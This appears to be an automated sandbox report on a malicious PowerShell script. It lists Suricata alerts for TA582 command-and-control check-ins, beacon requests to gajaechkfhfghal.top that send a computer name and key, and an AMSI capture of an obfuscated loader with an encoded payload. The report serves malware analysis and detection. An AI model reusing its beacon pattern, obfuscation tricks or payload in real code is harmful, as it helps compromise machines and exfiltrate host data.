Click to jump to signature section
Source: | Binary string: softy.pdb source: powershell.exe, 00000000.00000002.3229224031.000002DD5B96A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.3225453352.000002DD5B360000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbX7 source: powershell.exe, 00000000.00000002.3229224031.000002DD5B96A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.3225453352.000002DD5B360000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.3201834478.000002DD412B2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.3228386901.000002DD5B738000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.3201834478.000002DD412B2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ion.pdb source: powershell.exe, 00000000.00000002.3226938127.000002DD5B646000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: pdbpdblib.pdb source: powershell.exe, 00000000.00000002.3225453352.000002DD5B411000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbcb source: powershell.exe, 00000000.00000002.3229224031.000002DD5B96A000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows | Jump to behavior |
Source: Network traffic | Suricata IDS: 2859405 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.11.20:55426 -> 1.1.1.1:53 |
Source: Network traffic | Suricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49713 -> 142.250.72.100:80 |
Source: Network traffic | Suricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49712 -> 45.61.136.138:80 |
Source: Network traffic | Suricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.11.20:49712 -> 45.61.136.138:80 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgS_YOPMGIqQubsGIjDDgw4pi07QmdCsLmwjUg0poQNg5tH1cBlLPv-wBsN_2kJbAV83qbNVPqfrNYgUIPwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=kg5AIsdBJGqaoDI6lLp9ZVy37B_UMPmCjc7N2CfgPazlZwkudOedOxII0LJydfWhpkYVNH_qLJpPzajdsGynhPoQyFgwt7zj_oH_246Owf_nfnfksd6MvZIWkCJG1wmP7G17plxL-RmX1YglWcYOTfHOnvSZK-16-lipxAk_Hx2y9tIX-CMAKS0zsXrNSHwtsiqO |
Source: global traffic | HTTP traffic detected: GET /s7rtm36opvhtr.php?id=computer&key=10840995318&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gajaechkfhfghal.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgS_YOPMGIqQubsGIjDDgw4pi07QmdCsLmwjUg0poQNg5tH1cBlLPv-wBsN_2kJbAV83qbNVPqfrNYgUIPwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=kg5AIsdBJGqaoDI6lLp9ZVy37B_UMPmCjc7N2CfgPazlZwkudOedOxII0LJydfWhpkYVNH_qLJpPzajdsGynhPoQyFgwt7zj_oH_246Owf_nfnfksd6MvZIWkCJG1wmP7G17plxL-RmX1YglWcYOTfHOnvSZK-16-lipxAk_Hx2y9tIX-CMAKS0zsXrNSHwtsiqO |
Source: global traffic | HTTP traffic detected: GET /s7rtm36opvhtr.php?id=computer&key=10840995318&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gajaechkfhfghal.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgS_YOPMGIqQubsGIjDDgw4pi07QmdCsLmwjUg0poQNg5tH1cBlLPv-wBsN_2kJbAV83qbNVPqfrNYgUIPwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=kg5AIsdBJGqaoDI6lLp9ZVy37B_UMPmCjc7N2CfgPazlZwkudOedOxII0LJydfWhpkYVNH_qLJpPzajdsGynhPoQyFgwt7zj_oH_246Owf_nfnfksd6MvZIWkCJG1wmP7G17plxL-RmX1YglWcYOTfHOnvSZK-16-lipxAk_Hx2y9tIX-CMAKS0zsXrNSHwtsiqO |
Source: powershell.exe, 00000000.00000002.3203000138.000002DD446BF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$8u4tnovjczbe76f/$g79fts5u0p48woe.php? |
Source: powershell.exe, 00000000.00000002.3203000138.000002DD446BF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$8u4tnovjczbe76f/$g79fts5u0p48woe.php?id=$env:computername&key=$aonzmhlfvpjxy&s=527 |
Source: powershell.exe, 00000000.00000002.3225453352.000002DD5B3DC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000000.00000002.3225453352.000002DD5B3DC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000000.00000002.3226519710.000002DD5B480000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micrH |
Source: powershell.exe, 00000000.00000002.3203000138.000002DD44378000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3203000138.000002DD4452C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3203000138.000002DD43F3C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top |
Source: powershell.exe, 00000000.00000002.3203000138.000002DD44378000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3203000138.000002DD43F3C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top/s7rtm36opvhtr.php?id=computer&key=10840995318&s=527 |
Source: powershell.exe, 00000000.00000002.3203000138.000002DD44378000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top/s7rtm36opvhtr.php?id=computer&key=10840995318&s=527p |
Source: powershell.exe, 00000000.00000002.3220681685.000002DD533D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.3203000138.000002DD4353C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.3203000138.000002DD4353C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz |
Source: powershell.exe, 00000000.00000002.3203000138.000002DD4353C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000000.00000002.3203000138.000002DD43361000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.3203000138.000002DD4353C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000000.00000002.3203000138.000002DD4353C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.3203000138.000002DD4353C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz |
Source: powershell.exe, 00000000.00000002.3203000138.000002DD44535000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3203000138.000002DD4414C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3203000138.000002DD4454A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3203000138.000002DD4452C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000000.00000002.3203000138.000002DD4452C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000000.00000002.3203000138.000002DD4454A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgS_YOPMGIqQubsGIjDDgw4pi07QmdCsLmwjUg0poQNg5tH1cBlLPv-wBsN_2kJbAV83qbNVPqf |
Source: powershell.exe, 00000000.00000002.3203000138.000002DD44535000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3203000138.000002DD4414C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS_YOPMGIqQubsGIjDDgw4pi07QmdCs |
Source: powershell.exe, 00000000.00000002.3203000138.000002DD4414C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com0 |
Source: powershell.exe, 00000000.00000002.3225453352.000002DD5B3DC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0 |
Source: powershell.exe, 00000000.00000002.3203000138.000002DD43361000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000000.00000002.3220681685.000002DD533D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.3220681685.000002DD533D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.3220681685.000002DD533D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.3203000138.000002DD44535000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000000.00000002.3203000138.000002DD4353C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.3203000138.000002DD4353C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXz |
Source: powershell.exe, 00000000.00000002.3220681685.000002DD533D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.3225453352.000002DD5B3DC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: powershell.exe, 00000000.00000002.3203000138.000002DD4415D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3203000138.000002DD4455C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3203000138.000002DD4454A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3203000138.000002DD4452C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF90F037796 | 0_2_00007FF90F037796 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF90F038542 | 0_2_00007FF90F038542 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF90F0366DB | 0_2_00007FF90F0366DB |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF90F031FB8 | 0_2_00007FF90F031FB8 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF90F0335DA | 0_2_00007FF90F0335DA |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF90F02CD01 | 0_2_00007FF90F02CD01 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6208:304:WilStaging_02 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6208:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $6sutr2j47n5haxb.(([char[]]@((624775/9325),(448329/(-423+(37962696/(15307-(50686545/7455))))),(-6924+(12622584/1794)),(888-767),(7314-7230),(327-216)) -join ''))( $ivje2d60wlt8sq1 ) $6sutr2j47n5haxb.((-join (@((449168/6704),(9958-(32524700/(29615638/8969))),(2912-(8366-(41548290/7466))),(205275/1785),(705990/6990))| ForEach-Object { [char]$_ })))()$ivtqjdhkuxfc0wo.(([system.String]::new(@((-1061+1128),(-4031+4139),(136863/1233),(9887-9772),(247248/2448)))))()[byte[]] $3kyxjvceti9ruph = $ivje2d60wlt8sq1.((-join (@((188580/(-3828+(36243664/(15675-9707)))),(-8690+(69263870/(14741-(2903+3968)))),(146835/2259),(-7528+7642),(-101+(2193-1978)),(8253-8156),(316899/(2237+(2535716/(5356+1282)))))| ForEach-Object { [char]$_ })))() $xovq13gcm502y6r=$3kyxjvceti9ruph return $xovq13gcm502y6r}[System.Text.Encoding]::ascii.(([char[]]@((683091/9621),(9029-8928),(10278-(16902-6740)),(204844/(5540-(11817-8745))),(-789+905),(9160-9046),(8195-(82526090/10201)),(7913-(3891+3912)),(909902/8834)) -join ''))((hjsxql2ybz8gkwdf4p6uc15nevm "d+hiZXZpczh9M9TutQx3sgOs7BO5zLL3yUX9+PqPD0chI2tSAZm+YR53iVhhNtQit0F/7OJMqsamyCqJ9Cj78x6gHeqjJwSdpPoZkygS3o2O19opN7oVCkkTDU6Gy4hFp33WGAqWrvMuJIYc999XHAYYjdyVx7CrgZqjvoXSxOdED4yVk/StkoCWCkrHzaa5V/7XHQ8YDcqT3Ja1j3TF6piFTIKxrozFx7zXW0kQAt+W1N7s9F2Qi+0GPXfH7I4D1+xb4Zbfzs/U9CW53kzUggOGODAywJj6l58LugU2hFO3nl+J3ZjSiQuHppf0fPw9vLWgPx0Aj6TCGKAdUWWl+qC36d9yGpWi0GJVMQtK1GquLzqTj4EYOQWmOqdWReYqG4Qxyw7enXvRHtds3juhOSSMpYnLQ+YPMpSn4rTDGJfMvJZ73ZGvN+UGplfI29+Rw0Jdmwxiom7ChWfkNlhVl5LTO3bXZy5EBjqGjD1lGN8Ix4Tp3xEH0NDMxqKUmuy5I5Srm2Yjn3PR6ofR7Kf5sGqVyZesBpauPhEb08CPAWYSfIfHhIg4GaO6tYBvDOe5/fSE2YAEhvaAgwmMCRym7BGwtGihw21v74UXs0+Mpf7K9JnKj9UlwAKE+PdA6Z4PZQrhq0jfjM640JIltx2duGmeSFZkh9KuQVpRT+EVrUrJ8DzXgUVL8NIWwshMxmmfPkgNcGGfN/Mfwh1f76KNHQIUqQ08pv7MeAynDJPIZpc5UKQ5pbZ3eGunX25uWan64zsT3S5qtGKapUjbmWIxLLsFdsMwR1REqA5LksdznHqe6djJ9sEhGdSsVr3A5ZsAh+YJ7QMFGHJ9rIZOEYLZAT9E9sO+SwnK9Elhi9Mt7ZnC6Z3o4oAXjbMuDoLdb5eIke4dEFXQ0T090fkwRlkMp9rEXhyEtha9eqjFSwDrAnPIRioPGMiNwquTh9Sw2p+F11xQn5y/mNfmr04K1NwXm5yLl9D+nB+Po2xtAa7EVMel6p4Nsp4ano6Fh8Xy9L5t1hqTkZvSluYXjF5fL9H+EVL8SixrHWUlYLRHntpRLLGeoQwqy4yUDa+GYLctGbCx1vCwwGkEiEXWvimqG48r9Sexx2YMrw3b/v3Tee4LKIgJ95XydzoSEgGWpvGIgMrJ9100k7WKlJcWa8YFhEitv/Zn9mMiesEUw4783jx7TnTzLUUBM69HvqWR7bDAIQi6qp1ssg2ZWlaCdd/fLYqe3POEypRakYbr7IP+DhuFKuHDeKtDWCQ70cCBy910yH9C+v5HAnRoJ1QY31KDdmg7gj86xejerygWT4l+rlJcgijwHAdKjvm5o2OztDOfzB9NE5CYmYOwoLOayJ7sV9/d0mSYTBfnz5yMu/Btgs |